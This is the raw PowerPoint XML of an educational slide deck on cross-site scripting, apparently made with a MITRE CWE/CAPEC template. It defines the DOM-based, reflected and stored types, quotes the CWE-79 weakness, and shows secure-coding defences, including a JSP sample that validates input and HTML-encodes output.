          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM-Based XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Content served by a vulnerable web application includes script code used to manipulate the Document Object Model (DOM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is "reflected" off a vulnerable web application and then executed by a victim's browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This type of attack is a form of Cross-site Scripting (XSS) where a malicious script is persistenly "stored" within the data storage of a vulnerable web application. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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C9E2648-A70E-0E9E-BF7F-1189E2B1CC6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89427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A42A-D8F0-CE4A-0DFF-F8AE8E37000F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the Weakness - CWE-79</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBCAFB48-5911-82F7-EB2E-514499CB43B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as web page content that is served to other users.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED1B41F-84D3-21DE-F513-42187017570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28104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C4EA-0254-653C-209B-E25E7790080D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoiding the Weakness – Secure Coding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4914D45F-4F09-8B08-384F-C435DF3FB65C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  (only accept characters that make sense)​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use regular expression</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encode output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>(escape characters like "&lt;")​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>HTML encode​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>URL encode​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>JavaScript encode​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458A3893-D58F-65F2-4110-EB7E24D13F3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Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DEDD135-2622-199A-612E-468BC3F7FB85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729608" y="3596874"/>
            <a:ext cx="7010400" cy="25694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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;%​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strLabel</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request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("label");​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strLabel.matches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("^[a-zA-Z0-9]+$") == false) error();​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> %&gt;​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;P&gt;​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Label: &lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>encodeHTML</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strLabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) %&gt;​</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&lt;/P&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="692450742"/>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WE_CAPEC POWERPOINT TEMPLATE_2022 12Jan2022" id="{800B0BF9-EDC3-914E-BDA4-E9B5A9B0558D}" vid="{7AA02F7D-33D0-394F-9B62-90B714619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mitre-2018</Template>
  <TotalTime>17527</TotalTime>
  <Words>801</Words>
  <Application>Microsoft Macintosh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Courier New</vt:lpstr>
      <vt:lpstr>Helvetica LT Std</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>mitre-2018</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>What is Cross-Site Scripting (XSS) – CAPEC-63</vt:lpstr>
      <vt:lpstr>Simplistic Well-Known Example</vt:lpstr>
      <vt:lpstr>A More Real Example</vt:lpstr>
      <vt:lpstr>Types of XSS</vt:lpstr>
      <vt:lpstr>Exploiting the Weakness - CWE-79</vt:lpstr>
      <vt:lpstr>Avoiding the Weakness – Secure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XSS</dc:title>
  <dc:creator>Rich Piazza</dc:creator>
  <cp:lastModifiedBy>Rich Piazza</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-31T14:41:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-12T18:49:11Z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